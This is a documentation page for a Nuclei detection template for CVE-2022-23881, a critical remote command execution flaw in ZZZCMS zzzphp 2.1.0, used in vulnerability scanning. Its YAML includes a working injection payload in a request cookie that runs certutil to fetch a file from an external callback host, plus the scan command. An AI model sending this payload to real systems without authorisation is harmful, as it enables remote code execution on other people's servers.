ZZZCMS zzzphp 2.1.0 - Remote Code Execution
ID: CVE-2022-23881
Severity: critical
Author: pikpikcu
Tags: cve,cve2022,rce,zzzphp,zzzcms
Description
Section titled “Description”ZZZCMS zzzphp v2.1.0 is susceptible to a remote command execution vulnerability via danger_key() at zzz_template.php.
YAML Source
Section titled “YAML Source”id: CVE-2022-23881
info: name: ZZZCMS zzzphp 2.1.0 - Remote Code Execution author: pikpikcu severity: critical description: ZZZCMS zzzphp v2.1.0 is susceptible to a remote command execution vulnerability via danger_key() at zzz_template.php. impact: | Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patch or upgrade to a patched version of ZZZCMS zzzphp. reference: - https://github.com/metaStor/Vuls/blob/main/zzzcms/zzzphp%20V2.1.0%20RCE/zzzphp%20V2.1.0%20RCE.md - http://www.zzzcms.com - https://nvd.nist.gov/vuln/detail/CVE-2022-23881 - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-23881 cwe-id: CWE-77 epss-score: 0.16723 epss-percentile: 0.95904 cpe: cpe:2.3:a:zzzcms:zzzphp:2.1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zzzcms product: zzzphp tags: cve,cve2022,rce,zzzphp,zzzcms
http: - raw: - | GET /?location=search HTTP/1.1 Host: {{Hostname}} Cookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if}
matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http"
- type: status status: - 500# digest: 490a00463044022044b306829a835939c8dd926875aadf71b62df842ebd5babef2911b63dd3abfb402200c253c4d57690b5c8020038c641886e15d70ecdaabdb5773beff6295136bd432:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-23881.yaml"